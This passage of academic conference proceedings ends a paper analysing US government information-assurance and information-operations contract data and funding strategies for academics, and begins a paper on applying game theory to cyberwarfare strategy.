(e.g., principal-agent problems), interoperability issues and other transactions costs.<br />

There are several emerging areas involving the “social” and risk management aspects of IA/IO.<br />

Clearly, “social” is used here to mean relationships among groups of agents, individual or<br />

organizations that involve proprietary information. At the firm level, there is a need to assure individual<br />

firms that their partners, suppliers, or any organization they communicate with over the Internet are<br />

trustworthy to a defined level acceptable to upper management. The economic benefit of securing all<br />

members of the business group is significant. At the individual level there is growing demand to<br />

secure interpersonal communications involving proprietary information (marketing, strategy and<br />

planning, budgets or financial), email, data and image exchanges, instant messaging, etc. This is also<br />

an area of vital national interest to DoD and other Federal agencies.<br />

In addition, the global environment influencing customers as well as the Federal and Commercial IA<br />

segments is characterized by significant stress. Negative pressure from the environment that Federal<br />

and Commercial organizations must perform under has increased significantly since 2007. The United<br />

States government (USG) and the global international community, nation states, state-sponsored<br />

nongovernment organizations (NGOs), organizations, groups, and individuals have rapidly moved into<br />

15


Edwin Leigh Armistead and Thomas Murphy<br />

a new and more unstable situation. The Diplomatic, Intelligence, Military, Economic, Cultural/Social<br />

and Environmental factors (includes medical, earthquake, fire, wind and flood, etc) [DIMES-E] are<br />

considerably more powerful. That transition from a relatively steady state into an economically harsh<br />

state is bad enough. A new, transient and poorly understood unsteady state makes prediction of<br />

expected local and global situations uncertain and thus even more stressful. Together, the DIMES-E<br />

factors above mean three things for the future:<br />

Bad actors can be expected to act even worse and previously good actors may act badly<br />

Predicting the actor’s actions and timing will be too complex and uncertain to analyze in<br />

adequate, precise and satisfactory detail<br />

Better analysis and planning for steadily moving to a more stable and less uncertain future is of<br />

paramount importance.<br />

Consistent with this global situation, a shift towards IA and Cyber security is evident in the contracts<br />

data. Defending and assuring ones data, information and knowledge is the first basic step to<br />

managing both the DIMES-E transitions and the bad actors that resulting social stress a rapid<br />

transition brings out.<br />

IO, IW and IA are sometimes also grouped as network and information components of “Cyber War”<br />

(Carr, 2009). Like IO and IA, Cyber War is a term, which includes threats from:<br />

Cyber Attacks,<br />

Cyber Crime,<br />

Cyber Espionage,<br />

Informatized War,<br />

Information War, and<br />

Computer Network Operations<br />

Defending against these threats can potentially save billions of dollars to the USG, business and<br />

international organizations and thus serve to greatly reduce the stresses forcing the three dire<br />

expectations above. The bad actors involved are State, State-sponsored, and Non-State actors who<br />

use the Internet to attack and disrupt both military and civilian organizations. These actors: commit<br />

acts of espionage against Department of Defense and DoD contractor networks. This accelerates<br />

other nation states’ race to achieve parity or near-parity with superior U.S. military technology. They<br />

commit acts of network intrusion into U.S. critical infrastructure, remaining dormant until needed to<br />

delay or stop an imminent U.S. military action against an adversary state. They further commit<br />

espionage against U.S. corporations stealing millions in intellectual property. They also disrupt<br />

national economies and rob banks on an unprecedented scale.<br />

3. Analysis of IO, IW, IA and cyber contracts<br />

As part of this research, the authors conducted a series of searches on a commercial Federal and<br />

DoD business database known as INPUT (INPUT, 2010,) http://www.input.com. This tool is useful in<br />

that it stores all opportunities – past, present and future in archival form and one can search in both a<br />

functional (using multiple keywords) manner as well as an organizational one (across the federal<br />

government). In total, for this paper, searches for types of contracts were made using 13 key words. A<br />

general search on all keywords and separate searches on each individual keyword were run.<br />

Keywords included:<br />

Information Operations (IO)<br />

Information Warfare (IW)<br />

Information Assurance (IA)<br />

Perception Management<br />

Strategic Communications<br />

Psychological Operations (PSYOPS)<br />

Public Diplomacy<br />

Electronic Warfare (EW)<br />

16


Deception<br />

Operations Security (OPSEC)<br />

Cyber Security<br />

Cyber Operations<br />

Cyber Warfare<br />

Edwin Leigh Armistead and Thomas Murphy<br />

In addition, five different contract status categories were reviewed to include the following:<br />

Forecast Pre-RFP (Forecast Pre-Request for Proposal)<br />

Pre-RFP<br />

Post-RFP<br />

Source Selection<br />

Award (contract awarded)<br />

The data was pulled twice at a 12-month period – first in September 2009 and then again in<br />

September 2010, as shown in Tables 1 and 2. These numbers represent the contracts in the INPUT<br />

database either in process (in one of the pre-award states) or already awarded as of the date given in<br />

the table heading.<br />

Table 1: Status of all contracts by contract category as of september 2009<br />

September 2009 Forecast Pre-RFP Post-RFP Source Selection Award Total<br />

Information Operations 58 35 11 15 216 335<br />

Information Warfare 15 16 3 7<br />

100 141<br />

Information Assurance 79 143 22 45 399 688<br />

Perception Management<br />

2 2<br />

Strategic Communications 15 19 1 2 48 85<br />

Psychological Operations 6 2 3 3<br />

37 51<br />

Public Diplomacy 2 1 12 15<br />

Electronic Warfare 52 58 22 39 333 504<br />

Deception 5 7 6 7 46 71<br />

Operations Security 12 4 2 10<br />

48 76<br />

Cyber Security<br />

10 13 1 1 43 68<br />

Cyber Operations 2 2 5 9<br />

Cyber Warfare 1 2 2 5<br />

254 300 75 130 1291 2050<br />

Table 2: Status of all contracts by contract type as of september 2010<br />

September 2010 Forecast Pre-RFP Post-RFP Source Selection Award Total<br />

Information Operations 16 15 3 6 76 116<br />

Information Warfare 4 5 1 5<br />

41 56<br />

Information Assurance 46 70 7 30 290 443<br />

Perception Management<br />

1 1<br />

Strategic Communications 15 10 1 5 61 92<br />

Psychological Operations 8 4 2 3<br />

41 58<br />

Public Diplomacy 3 13 16<br />

Electronic Warfare 13 12 8 9 138 180<br />

Deception 5 7 5 6 56 79<br />

Operations Security 8 13 4 6<br />

62 93<br />

Cyber Security<br />

11 15 3 4 53 86<br />

Cyber Operations 1 1 11 13<br />

Cyber Warfare 1 3 3 5 12<br />

131 151 38 77 848 1245<br />

17


Edwin Leigh Armistead and Thomas Murphy<br />

From the 2010 set of data, we sorted by company name and counted the number of contracts in the<br />

award state (awarded) to each company. Table 3 shows that only 29 out of 341 companies won more<br />

than two awards, and only eight companies won more than 10 awards out of the data reviewed in this<br />

research.<br />

Table 3: Frequency of awarded number of contracts as of september 2010<br />

Awards 1 2 3 4 5 6 8 ≥ 10<br />

# of Companies 242 49 7 7 4 2 1 8<br />

Success of the Awardees could be measured several ways, total number of contracts awarded, total<br />

dollar value of contracts awarded, award $$ per employee, etc. We use a simple measure important<br />

to academic researchers, the total number of contracts, since it is a straightforward measure of their<br />

best sources of opportunities. Using the data on awarded contracts from the INPUT database we<br />

found that the eight corporations that won 10 or greater IO contracts in Table 3 included the following:<br />

Northrop Grumman Corporation 41<br />

Science Applications International Corporation (SAIC) 40<br />

General Dynamics Corporation 20<br />

BAE Systems PLC 19<br />

Lockheed Martin Corporation 19<br />

Booz Allen Hamilton 15<br />

CACI International Inc 15<br />

L-3 Communications Inc 10<br />

This information shows that as IA and IO have matured in the Federal and DoD marketplace, the<br />

competition appears to be centering more and more on the same key players. Knowing the players<br />

who have won the most contracts suggests strategies for entering the fray.<br />

4. Strategies for entering the fray<br />

The academic researcher must deliver at least best practice and more importantly, unique or worldclass<br />

theories, models, products or services to the contract team in order to be successful. This<br />

applies to individual contributions as well as for the products and services they are developing. After<br />

satisfying these basic requirements for success, there are several key strategies for entering the fray<br />

and selecting what aspect of IO, IW or Cyber to work on. Key strategies laid out in our previous paper<br />

in 2007, centered on the following strategies:<br />

Allying Oneself with the Leading Contenders<br />

Developing a Front Runner<br />

Striking out on your Own<br />

In light of the updated contract information and current international situation, in the author’s opinion,<br />

the new key strategies are as follows:<br />

Develop strong relationships with key individuals of those corporations that are consistently<br />

winning IO and IW contracts<br />

Focus on IO/IW areas that have the most contracts (IA and Cyber Security)<br />

Stay aligned with growing areas of interest in the community (e.g. Strategic Communications)<br />

4.1 Developing strong relationships<br />

The eight companies listed earlier have won about 25% of the total IO and IW contracts from our<br />

research data, and there is a good reason for that. IO and IW, like any endeavor, require a certain<br />

amount of expertise in the form of personnel, capabilities and past performance. Government<br />

contracting officers and their technical representatives are, in general, conservative and will often go<br />

with the “tried and true” company that has performed these duties in the past. A good example is<br />

Northrop Grumman who ran the IO Center of Excellence for the Army at Ft Belvoir for an extended<br />

period and were recently also awarded the contract to run the IO Center for the US Marine Corps.<br />

18


Edwin Leigh Armistead and Thomas Murphy<br />

Clearly, a strong relationship with a company which wins numerous contracts offers more<br />

opportunities for teaming on those contracts.<br />

<strong>Academic</strong>s, like the contracting company, should plan to review and update their strategies at least<br />

once a year, and must be ready to adapt to changes in the acquisition requirements (FAR), market<br />

dynamics and technological innovations. The academic can thus align their contributions to the<br />

company’s contracted requirements. The academic team member can assist the company in<br />

establishing and enhancing service offerings, building corporate values, establishing infrastructure to<br />

support corporate vision, and providing synergy by leveraging corporate resource bases.<br />

4.2 Focus on IA and cyber security<br />

Out of all of the areas of IO and IW, it is IA and Computer Security that hold the most promise,<br />

potential and by our research – the reality of income for academic research. Every business and<br />

military organization needs protection for their computer systems. We see a serious present need to<br />

fix a significant Defensive shortfall in the US cyber position, particularly the commercial and civilian<br />

infrastructure areas. Armistead and Clarke (Armistead, 2010; Clarke & Knake, 2010) emphasize the<br />

central and crucial importance of improving Defensive Cyber capability, and of having open debate on<br />

Cyber strategy/planning/policy – similar to the process carried out for nuclear weapons when that<br />

technology emerged 50 years ago.<br />

4.3 Watch Strategic Communications<br />

Strategic Communications (SC) is an area of continuing interest in the USG, in particular to the DoS<br />

and DoD (Armistead L., 2010). SC should also be watched as a candidate for future contract growth.<br />

SC is important because it addresses a much broader, more informed view of the very demanding<br />

DIMES-E world situation the USG faces today. Because the academic community will find a number<br />

of areas in SC to which they can contribute, we include the following background details. As<br />

discussed in our previous paper (Armistead & Murphy, 2007) and by Paul (Paul, 2010), Strategic<br />

Communications refers to five areas with differing but related meanings:<br />

Enterprise level strategic communication<br />

Strategic communication planning, integration, and synchronization processes<br />

Communication strategies and themes<br />

Communication, information, and influence capabilities<br />

Knowledge of human dynamics and analysis or assessment capabilities.<br />

Paul points out that “these five specifications connect to each other logically. Within the broader<br />

strategic communication enterprise, national or campaign level goals and objectives constitute the<br />

inputs to the strategic communication planning, integration, and synchronization processes. Based on<br />

knowledge of human dynamics and analysis or assessment capabilities, these processes transform<br />

and incorporate the communication strategies and themes and provide them to commanders who<br />

employ the various available communication, information, and influence capabilities in pursuit of<br />

desired objectives. The planning, integration, and synchronization processes and knowledge,<br />

analysis, and assessment capabilities continue to be useful to force elements as they broadcast or<br />

disseminate their themes and messages or otherwise engage and appraise the impact of these<br />

activities”. The reader is referred to (Paul, 2010) for details of the following SC elements.<br />

Enterprise level strategic communication is a commonly shared but general understanding of SC;<br />

it refers to a broad range of USG enterprise level activities and their coordination for internal,<br />

national, international or global strategic goals. Enterprise level strategic communication is<br />

therefore too broad to be very meaningful.<br />

Strategic communication planning, integration, and synchronization processes are the set of<br />

processes included under the overly general USG enterprise level use of “Strategic<br />

communication”.<br />

“Communication strategies and themes are strategic communication elements that involve<br />

content and both the inputs and outputs from the strategic communication planning, integration,<br />

and synchronization processes”. This includes national or campaign goals or objectives (inputs)<br />

that planning processes will translate into communication goals and themes (outputs) and<br />

incorporate into plans. However, there is a multilevel application of these elements. The focus on<br />

19


Edwin Leigh Armistead and Thomas Murphy<br />

these elements of strategic communication can be on levels at, above or below the USG<br />

enterprise level. They could involve higher-level international strategic goals and the implied<br />

communication. Alternatively, they could consider objectives and themes in lower level<br />

operational organizations to be coordinated with and communicated by various communication,<br />

information, and influence assets.<br />

Communication, information, and influence capabilities are broadcast, dissemination, and<br />

engagement elements of SC. Communication, information, and influence capabilities include<br />

public affairs, perception management, psychological operations (PSYOP now MISO), defense<br />

support to public diplomacy (DoD to DoS), and civil affairs. These capabilities are thus very broad.<br />

They can be combined with elements of force, such as maneuver conducting civil-military<br />

operations or military police. They might include the interactions of any element of the USG<br />

military, diplomatic or other forces with foreign populations or the prevalence of language and<br />

cultural awareness training across the force. They might include any action or comment by every<br />

deployed diplomatic or military service member.<br />

Knowledge of human dynamics and analysis or assessment capabilities are the fundamental<br />

bases for all the preceding specified activities. In contrast to processes, knowledge, analysis and<br />

assessment are the bases of accurate models for planning effective, efficient, and successful<br />

actions. Knowledge is obtained via media monitoring, media use pattern research, target<br />

audience analysis, and social, historical, cultural, and language expertise, along with other<br />

relevant analytic and assessment capabilities. “Cultural knowledge and audience analysis are<br />

critical for translating broad strategic goals into information and influence goals. Understanding<br />

audiences specifically and human dynamics generally is critical to identifying themes, messages,<br />

and engagement approaches that will lead to desired outcomes. Data collection and assessment<br />

contribute the feedback that allows two-way communication and engagement (rather than just<br />

broadcast) and that also makes it possible to demonstrate and report impact or effect from<br />

communication activities.” (Paul, 2010)<br />

Thus, the academic researcher could contribute SC applications of Business Marketing, Psychology,<br />

Narratives, Political Science, Economics, and many other disciplines.<br />

5. Future areas of research<br />

Several assumptions must be made when determining IA/ IO needs over the next five years. The first<br />

is that the U.S. economy will continue to rebound from the great recession. The second is that the<br />

U.S. will fund continuing IA efforts in the Federal budget. The third assumption is that information<br />

operations will continue to a growth market, thus the continuing need to bolster IA needs,<br />

requirements and solutions. Continued introduction of unique discriminating Security offerings, such<br />

as an integrated set of IO services, will be vital to keeping revenue up in the contracted companies. IA<br />

services price elasticity is based on the demand from the customer base and costs for having<br />

qualified, trained and certified personnel. These personnel allow the contract team to reach critical<br />

mass in Knowledge Management, create a good reputation, and built consistent security teams to<br />

provide IA functions to customers. Given these assumptions, the customer base will remain high and<br />

that their IA needs and requirements, as well as their budgets, will continue to grow. Acquiring and<br />

maintaining personnel to support IA/IO contract teams will continue to be a challenge to employers<br />

and an opportunity for academics.<br />

How will current capabilities and technologies develop and evolve over the next five years? We can<br />

expect the introduction of a host of new technologies presenting opportunities for IT security vendors.<br />

Many of these will be wireless devices, particularly nomadic devices for home and business users.<br />

The expectation is the continued increased blending of technologies, such as is just beginning to<br />

occur in Internet and cable TV technologies. Increasingly, users of computing devices will have<br />

access to a combination of web-based technologies, including traditional HTTP/IP communications,<br />

streaming video, voice over IP (VOIP), global positioning systems and database applications. Users<br />

will be able to seamlessly move between these technologies via increasingly sophisticated user<br />

interfaces and input/output devices. The blending of technologies, along with increased use of<br />

service-oriented architecture (SOA), will increase the need for multi-level and cross-domain security<br />

capabilities. Cross-domain security requirements will increase significantly, as the ability to share data<br />

across SOAs will increase the need for securing privacy and classified data extracted from databases<br />

for use in other applications. Likewise, the DoD trend towards employing SOAs to support net centric<br />

operations will make C&A increasingly difficult. Biometric identification and access control<br />

technologies will be a growth industry, particularly in the area of identity verification technologies for<br />

20


Edwin Leigh Armistead and Thomas Murphy<br />

use by home PC users in eCommerce. Identity theft protection needs will continue to increase, as<br />

criminals develop increasingly sophisticated means of stealing electronic identity data. The need for<br />

technologies to detect spoofing in emails and on websites will continue to grow. Finally, the capability<br />

to perform software verification and validation (V&V) to determine the inherent security of software<br />

code will become an area of increasing significance.<br />

We argued in the Strategies to Entering the Fray section, based on our analysis of current and<br />

expected contracts, that IA and Cyber Defense will receive increasing attention. Armistead and Clarke<br />

(Armistead, 2010; Clarke & Knake, 2010) also emphasizes the central and crucial importance of<br />

improving Defensive Cyber capability, and of having open debate on Cyber strategy/planning/policy –<br />

similar to the process carried out for nuclear weapons when that technology emerged 50 years ago.<br />

We appreciate the need for coverage and analysis of Defensive and Offensive Cyber strategy,<br />

operations and tactics. More importantly, we also see a serious need to fix a significant Defensive<br />

shortfall in the US cyber position. Because there is no agency with responsibility for Defense of<br />

civilian banking, commercial, industrial systems, and because the DoD and the USG partially depend<br />

on the commercial internet, a monumental vulnerability exists. Engaging in conflicts with a good<br />

offense but without a good defense will fail. The nation as a whole now finds itself in that situation.<br />

These factors define additional reasons the authors switched to the Defensive current focus in our<br />

Strategies for Entering the Fray section. Both Armistead and Clarke (Armistead L., 2010; Clarke &<br />

Knake, 2010) outline a process to establish a well-founded strategy-policy-plan and minimize risk of<br />

uncontrolled Cyber-Kinetic War. These analyses suggest several topics, simulations and desktop<br />

exercises, which would be useful to USG contract work. A well-founded analysis must address our<br />

overall Strategy and Political situation, with military and cyber strategy as a component of national<br />

strategy.<br />

A difficult area needing both theoretical and practical development is formulating Measures of<br />

Performance [MOP] and Measures of Efficiency [MOE] (Tokar, 2010). This is a focus area of military<br />

effects based (EB) planning. Roughly, when carrying out missions involving the application of<br />

components of IO, IW, Cyber, etc., we need to measure if we are “doing the right things” to effectively<br />

achieve our desired goals [MOP] and if we are efficiently “doing things right” [MOE] to not waste time,<br />

$, equipment and people. A related concept in the business world, which will be increasingly<br />

importance as USG and DoD budgets narrow, is Return on Security Investment [ROSI]. The difficulty<br />

with these ideas is in measuring the impact of one component alone when multiple different initiatives<br />

are brought to bear. How one separates the effects of one from the combination of all is directly<br />

related to the model of the complex DIMES-E processes being used.<br />

Finally, the need for new and improved models of complex, DIMES-E systems is the most<br />

fundamental barrier to achieving success, performance and efficiency. The benefits from such<br />

insightful theory and models will be similar to the leap forward in physical sciences resulting from<br />

Newton’s or Kepler’s Laws. If we are to more simply and accurately understand, predict and act to<br />

bring about a desired future, and if we are to be able to tease out the effects of one factor (e.g. SC,<br />

MISO, etc.) from the effects of many, then we must discover and apply much more insightful theories<br />

and mathematical models to DIMES-E systems. Such models can clarify the attribution of who and<br />

what is really at work and how to anticipate and adjust to the situation. This will allow everyone,<br />

leaders and members of governments and organizations alike, to move beyond simply knowing they<br />

are in serious hardship or risk, to appreciate what is being done right and what is not, and act to bring<br />

about a more desirable future rather than an expected undesirable future.<br />

6. Summary<br />

Our overall goal has been to provide both the sources of funding opportunity for academic<br />

researchers as well as sufficient background to understand the strategies for acquiring funding from<br />

those sources. We first described the intuition and insight into the motivation of players, relationships<br />

and integrated influences in the IA and IO business growth areas. In particular, we noted the<br />

important influence of stress from external conditions and global DIMES-E situations. The ability to<br />

understand and address these integrated problem areas is fundamental to an academic’s funding<br />

success. Based on an analysis of contracts up to September 2010, we noted a current focus on IA<br />

and Cyber security. We concluded that IA and Cyber Security are areas that should and will continue<br />

to receive contract funding. Next, we further analyzed current and historical IO, IW, IA and Cyber<br />

contracts and identified which companies have been awarded more contracts to date and are thus<br />

“opportunity targets” for academic consulting. We provided details of strategies to enter the contract<br />

21


Edwin Leigh Armistead and Thomas Murphy<br />

fray, suggesting that understanding the contract, the contractor and developing strong relationships<br />

with contractors is essential. We give substantial details on how and why one develops strong<br />

relationships. We call attention to the area of Strategic Communications as a possible future area of<br />

opportunity given the broader scope of integration and application of security contract focus. Finally,<br />

we mention several future areas of research, giving the assumptions made as well as details of<br />

selected difficult but very important technical, complex predictive modeling and MOE/MOP areas that<br />

need to be solved.<br />

References<br />

Armistead, E., & Murphy, T. (2007). The Evolution of Information Assurance and Information Operations<br />

Contracts across the DoD: Growth Opportunities for <strong>Academic</strong> Research. ICIW <strong>Conference</strong>. Monterey, CA.<br />

Armistead, L. (2010). Information Operations Matters - Best Practices. Washington, D.C.: Potomac Books, Inc.<br />

Carr, J. (2009). Inside Cyber Warfare. O'Reilly.<br />

Clarke, R. A., & Knake, R. K. (2010). Cyber War - The Next Threat to National Security and What to do About It.<br />

New York, NY: HarperCollins.<br />

INPUT. (2010). INPUT database, INPUT. Retrieved 2010, from "The Authority on Government Business"<br />

[Online]: http://www.input.com<br />

Paul, C. ( 2010). “ Strategic Communication” Is Vague, Say What You Mean. Joint Forces Quarterly, Issue 56 .<br />

Tokar, J. (2010). Assessing Operations:MOP and MOE Development. IO Journal, Vol. 2, Issue 3 , 25-28.<br />

22


The Uses and Limits of Game Theory in Conceptualizing<br />

Cyberwarfare<br />

Merritt Baer<br />

Harvard Law School, Cambridge, USA<br />

mbaer@post.harvard.edu<br />

Abstract: In cyberwarfare, there are obstacles to reaching minimax stasis: unlike in checkers, game theory<br />

cannot follow each decision path to its conclusion and then trace the right decisions back. However, I contend<br />

that because the rational predictability of game theory will continue to drive decisions and seek out patterns in<br />

them, game theory may identify (and intelligently weight) nodes of a decision tree that are not immediately<br />

recognizable to or favored by human decision-makers. While we can‟t create a network that is maximally<br />

resistant to random faults and maximally resistant to targeted faults, we can take into account the particular<br />

weaknesses and likelihoods of attack so that the weaknesses overlap in resistant ways-- ways that correspond to<br />

risk preferences and security priorities. Moreover, using game theory to make a security strategy that is a<br />

calculated derivative of mapped potential outcomes will help us to avoid human biases and to respond to threats<br />

proportionately/economically. Rather than a process of continual growth, cyber evolution, like biological evolution,<br />

seems more aptly characterized as punctuated equilibrium—periods of relative stasis followed by quick, drastic<br />

periods of breakthrough. Reaching Nash equilibrium is unlikely in the cyberwar context because under unstable<br />

conditions, evolutionarily stable strategies don‟t run a typical course. While there may be no set of moves that is a<br />

“solution” in cyberwar strategy, game theory allows human decisionmakers to intelligently identify and weight<br />

decision paths to transcend cognitive biases. This paper seeks to change the way of thinking about cyberwar--<br />

from one of stockpiling weapons, to one of looking for patterns-- thinking about the problem of cyber insecurity<br />

more holistically. The paper challenges some of the myopia in thinking about cyber in existing "warfare" terms<br />

and proposes that organic models‟ tendency toward game theoretic equilibrium may help us conceive of the<br />

cyberwar decisionmaking landscape more effectively.<br />

Keywords: cyberwarfare, game theory, layered defense, Nash equilibrium<br />

1. Introduction<br />

In this paper I explore the applications and limitations of game theory to cyberwarfare at a conceptual,<br />

not case study, level. My focus is on federal strategy—especially the United States Department of<br />

Defense (DoD)—so I do not focus on addressing cybercrime or cyberattack that has as its purpose<br />

money or a local, ideological message, or even those with cyber -terrorist or -anarchist goals. My<br />

focus is on large-scale acts of war aimed at military, governmental or infrastructural targets that<br />

currently only certain nation-states are likely to be able to execute, thus the other “players” in the<br />

game are nation-state-level actors.<br />

I recognize that cyberwarfare is among the rarer forms of online violence in comparison with other<br />

forms of cybercrime, but its high stakes and opportunities for more contained strategic study attracted<br />

my focus. For the purposes of this paper, I assume we have available all existing sophisticated game<br />

theoreticians, human or computerized.<br />

I find that game theory is useful to the extent that it allows us to transcend some of our systemspecific<br />

biases (based on established or institutional ways of approaching problems) and threatspecific<br />

biases (rooted in evolutionarily-derived disproportionate reactions to certain threats). Game<br />

theory can allow us to weigh the nodes of the decision tree more accurately; it is not a solution as<br />

such, but a tool for holistic cyberwarfare strategy.<br />

2. Background: Nash equilibrium and complications to game-theoretical<br />

stasis in the cyber context<br />

Game theory scholars have written, though not extensively, on the application of game theory to<br />

information warfare. (See, e.g., Hamilton et al, “The Role of Game Theory in Information Warfare” and<br />

“Challenges to Applying Game Theory to Information Warfare”). The US Cyber Consequences Unit<br />

(US-CCU) claims it primarily employs an analytic method called “Value Creation Analysis” that<br />

“draws…broadly on cooperative game theory.” (See US-CCU website, "http://www.usccu.us/"<br />

http://www.usccu.us/).<br />

Two-player stochastic games may be useful in the escalation context (deciding whether to launch a<br />

preemptive attack or responding to an attack could be a two-player interaction). A study by SPIE has<br />

23


Merritt Baer<br />

refined the metrics for estimating impact and intent of cyberattack, and applies Markov game theory, a<br />

stochastic approach. (Shen et al. 2007) However the two-player stochastic model is not valid any time<br />

when more than one player is involved, and this is the more likely scenario— as in the case of a<br />

generalized security model that would account for more than one player as a potential threat, or a<br />

model that includes potential alliances.<br />

The minimax solution in zero-sum games is Nash equilibrium (where each player is at her optimal<br />

level, taking into account the other players' strategy). There exists “at least one Nash equilibrium,<br />

possibly involving mixed strategies, for any normal- form static game with a finite number of players<br />

and strategies” (Jamakka, 2005:14). However, in cyberwarfare, there are obstacles to reaching<br />

minimax stasis: there is no assumption that it is a zero-sum game (power may exist relative to others<br />

but in cyber there can be emerging forms of power and there may be no clear endpoint that signifies<br />

“winning”); there may be more than two players; players may make simultaneous and overlapping<br />

moves (instead of taking turns like in chess); and there is no valid assumption of perfect information<br />

(one‟s minimax strategy may depend on knowing the capabilities of the other players).<br />

Moreover, the possibility of alliances disrupts Nash equilibrium because if players can agree on<br />

strategies different from minimax, they may achieve higher payouts. The classic example of this is a<br />

cartel manipulating the market; in the cyber realm, it could take the form of inter- national or even nonnationstate<br />

collaboration among players. U.S. vulnerability to alliance-making by other players is<br />

accentuated by the fact that we have more to lose— our government and our private-sector cyber<br />

capabilities/ data are overall more valuable than other countries' (Hathaway, 2009:16).<br />

Some, including former Department of Homeland Security Secretary Michael Chertoff (in Espiner<br />

2010) compare nuclear strategy to cyber strategy. However, cyber weapons defy nuclear game<br />

theoretic strategy because cyber weapons are amorphous and can be pinpointed— used as a scalpel<br />

instead of, or as well as, a hammer. Even cyber weapons that are clearly war-oriented, like Stuxnet,<br />

can be more controlled and monitored in use than nuclear weapons, may take time to detect and may<br />

cover the executor‟s tracks. Unlike the nuclear arena, in which even those with capabilities have so far<br />

resisted employing nuclear weapons, cyberwar weapons have been and will continue to actually<br />

come into use—but in nuanced and creative ways that elude traditional definitions of use of force,<br />

weapons, or war.<br />

For all these reasons, it seems likely that we cannot use game theory in the traditional method of<br />

modeling the game‟s endpoints and then reversing the moves that would lead to stasis, because we<br />

may never reach equilibrium. This is another way of saying that the game may have multiple Nash<br />

equilibria-- “Game theory cannot necessarily predict the outcome of a game if there are more than<br />

one Nash equilibriums [sic] for the game. Especially when a game has multiple Nash equilibriums [sic]<br />

with conflicting payoffs...” (Jamakka et al., 2005: 14). If the parties do not reach stasis then by<br />

definition the game will continue because players have an incentive to change their decision--it is only<br />

at equilibrium that (optimal payout exists and therefore) there is no incentive to change decisions.<br />

Accordingly, this paper‟s analysis begins from an acknowledgment that in cyberwar, there may be no<br />

“solution.” In cyberwar, unlike in checkers, game theory cannot follow each decision path to its<br />

conclusion and then trace the right decisions back. The “right decisions” may evolve and the endpoint,<br />

if there is one, is unknown. However, game theory continues to be useful in cyberwar strategy<br />

because the rational predictability of game theory will continue to drive decisions and seek out<br />

patterns in them, and because game theory may identify and intelligently weight nodes of a decision<br />

tree that are not immediately recognizable or historically favored by human decision-makers.<br />

The paper begins by acknowledging a number of ways in which cyberwar defies traditional game<br />

theory models. It describes why a biological model is the most useful analogy, including the<br />

epidemiological response to invasion and the evolutionary tendency toward equilibrium. Then it<br />

explores the benefits of game theory, describing ways in which it is a uniquely useful tool for<br />

cyberwarfare strategy as an ongoing set of decisions in a changing set of conditions.<br />

24


3. Limits to using game theory<br />

3.1 The economics of cyber insecurity<br />

Merritt Baer<br />

Game theoretical explorations assume perfect rationality, but economically, there are a number of<br />

ways in which the current cybersecurity system lacks the incentives to operate at what might be<br />

termed “rational” full strength. One is the problem of externalities-- like air pollution, most individuals<br />

underinvest in their own security out of a perception that the problem (and its solution) does not target<br />

them directly. (Anderson and Moore 2006). This emerges in many contexts where vulnerabilities are<br />

not clearly attributable to the responsible actor; Daniel Geer, Chief Information Security Officer of the<br />

Central Intelligence Agency‟s venture capital fund In-Q-Tel, (2010) struck a comparison to the<br />

evolution of laws that would enforce responsibility for cleaning up a toxic waste spill and dealing with<br />

those affected by it. Personal underinvestment in security means vulnerability to botnet appropriation<br />

of computers, as well as facilitation of anonymity-inducing programs like Tor, which allow a hacker to<br />

stage a virtually untraceable attack. (See, e.g., Wilson 2008). Computers under remote botnet control<br />

are growing at an average of 378% each year, according to grassroots security monitoring<br />

organization Project Honey Pot; this translates to ease of launching denial-of-service (DDoS) attacks<br />

and decreased likelihood of tracing an attack. The DDoS attacks—both against Wikileaks (Carney<br />

2010) and against its detractors (Reuters 2010) --made use of those who passively or voluntarily<br />

submitted their computers to botnet control.<br />

Internet founder Vint Cerf (in Schofield, 2008) made the Hobbesian observation that “[i]t seems every<br />

machine has to defend itself. The Internet was designed that way. It‟s every man for himself.” The<br />

Internet may require individuals to self-protect, but it wasn‟t “designed” for individuals to take the reins<br />

in security—it was simply not designed for security. It is designed, to the extent that one can say it<br />

was designed, for openness. Security may fall to individuals but the current structure doesn‟t provide<br />

the necessary incentives for them to make that investment. Game theoretical assumptions about<br />

rationality are thrown off by the human tendency to underinvest when there are externalities. As<br />

software engineer Brad Shapcott famously said, “The Internet isn‟t free. It just has an economy that<br />

makes no sense to capitalism.”<br />

Re-aligning incentives to prioritize an optimal level of individual cybersecurity investment is an<br />

economics task, but no one has ownership of the problem or the impetus to even get robust<br />

information about it. As Jonathan Zittrain (Harvard Law 2010) stated, “Because no one owns this<br />

problem, no one is paying for monitoring software to get the picture they need, to be accurate.”<br />

Contrastingly, in the private sector economic objectives often reward security—such as the case study<br />

of the US banking industry compared with the UK banking industry. In US bank security, credit card<br />

fraud has been the responsibility of the bank. UK banks initially refused responsibility for ATM error,<br />

and it created a “moral hazard” incentive for bank employees to act carelessly. (Anderson and Moore<br />

2006: 610-613).<br />

On a higher level of abstraction, there are externalities because of government reliance on private<br />

sector cybersecurity technology. When this reliance couples with any tolerance for inefficiency, such<br />

as those that result from revolving door corruption or transparency concerns, it constricts the<br />

competitiveness of government contract assignment. This produces high-level inefficiencies. (See<br />

Baram 2009). According to a study by the Center for Public Integrity, only about one-third of Pentagon<br />

contracts were awarded following competition between two or more bidders. (Calbreath 2005). The<br />

cost premium of outsourcing defense contracts to private sector providers is only justified by the<br />

innovation push that the private sector is assumed to have; if government-to-company contracts are<br />

instead funneled through sole-source contracts, this innovation advantage assumption may not be<br />

valid, and the price premium may not be justified. (See Arnold, S. A. et al., 2009: 25). Small levels of<br />

distorted investment can produce large results in absolute terms because the numbers are so large--<br />

the total investment in research, development, test and evaluation (RDT&E) and procurement funds<br />

for the DoD major defense acquisitions portfolio is a staggering $1.6 trillion yearly (GAO Report 2009).<br />

3.2 Imperfect competition and the investment-to-security payout<br />

Companies are moved by (and have a legal fiduciary duty to prioritize) their own bottom line; there is<br />

no independent incentive to collaborate toward producing high-quality security products. Thus at the<br />

federal level, great dependency on private contractors in the cyber weapons arena can distort cost<br />

efficiency calculations in game theory. Our investment in security may not lead linearly to a higher-<br />

25


Merritt Baer<br />

security end-result, as is presumed by security-investment-level calculations. See, e.g., Schavland,<br />

Chan and Raines (2009:629): “Our model places a dollar valuation on the insurance we are willing to<br />

purchase for information security." Yet the assumption of a linear connection between investment and<br />

security is generally inaccurate. Karen Evans, Administrator for Electric Government and Information<br />

Technology, Office of Management and Budget (2007), emphasized in a statement to a congressional<br />

subcommittee that when it comes to e-security, neither high spending nor high regulatory compliance<br />

translate directly to actual higher security.<br />

